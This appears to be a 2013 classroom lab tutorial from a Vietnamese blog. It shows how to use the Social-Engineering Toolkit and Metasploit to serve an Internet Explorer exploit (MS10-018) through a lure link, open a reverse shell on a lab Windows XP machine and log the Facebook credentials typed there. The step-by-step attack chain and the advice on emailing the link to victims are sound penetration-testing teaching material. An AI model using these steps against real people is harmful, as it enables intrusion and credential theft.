Thứ Hai, 18 tháng 11, 2013

Hướng Dẫn Thực Hành - (Social Engineering Toolkit (SET): Lesson 2

{ Create Malicious Weblink to Sniff Victim's Keystrokes }
Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
    • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
  • Social Engineering Note
    • Image an attacker embedding the malicious link   in an email to a possible victim.
    • The Victim does not inspect the link before he clicks on it to notice that the link is an IP Address instead of a domain name.  In addition the IP Address is listening on a different port. 
      • (ie., http://192.168.1.105:8080) 
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the following has occurred:
      1. A Metasploit payload was injected to their system
      2. A Metasploit session is attached to their system
      3. The attached session was migrated from iexplorer.exe to notpad.exe.
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Exploit Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Web Attack
    • Instructions:
      1. Select 3
  6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
    • Instructions:
      1. Select 15
  7. Windows Shell Reverse_TCP
    • Instructions:
      1. Select 1
  8. Set Reverse Port
    • Instructions:
      1. Set to 5555
  9. Waiting for the server to start
    • Instructions:
      1. Copy the weblink that is listed above the Server started line.
      2. Continue to the next section.
    • Notes:
      • This is the malicious weblink that will be used by the attacker to to social engineer their way into the victim's machine.

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Image how an attacker could embed the malicious link provided in Section 4, Step 9 in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
     
Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, get the IP address from Section 5, Step 9.
    • Note(FYI):
      • The Web Browser will just crash.

Section 7. Analyzing Results After Web Browser Crash
  1. Start up a Command Prompt
    • Instructions:
      1. All Programs --> Accessories --> Command Prompt
  2. Start up a Command Prompt
    • Instructions:
      1. netstat -nao | findstr 5555
      2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
      3. tasklist | findstr notepad
    • Proof of Lab Instructions: (có thể bỏ qua bước này)
      1. date
      2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "Nguyen Tuong Minh"
      3. Do a PrtScn
      4. Paste into a word document

Section 8. Entering the Victim's Machine
  1. Get a MSF Prompt
    • Instructions:
      1. Press <Enter>, when you see the notepad.exe line.
  2. Obtain the Victim's Command Prompt
    • Instructions:
      1. sessions
      2. sessions -i 1
      3. execute -f cmd.exe -i -M
  3. Start the keystroke sniffer
    • Instructions:
      1. Press the <Ctrl> and "z" key at the same time.
        • This will put session 1 into the background.
      2. y
      3. keyscan_start
      4. Continue to next Section.

Section 9. Login to Facebook
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
     
  2. Login into Facebook
    • Instructions:
      1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
      2. Password: Use whatever you want.

Section 10. Review sniffed keystrokes
  1. Exit Web Attack Menu
    • Instructions:
      1. keyscan_dump
        • This will proceduce the Facebook
      2. keyscan_stop
    • Proof of Lab Instructions #2:
      1. Do a PrtScan
      2. Paste into same word document that contains proof of lab #1.

 
Người đăng: vào lúc
Nhãn: ,

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)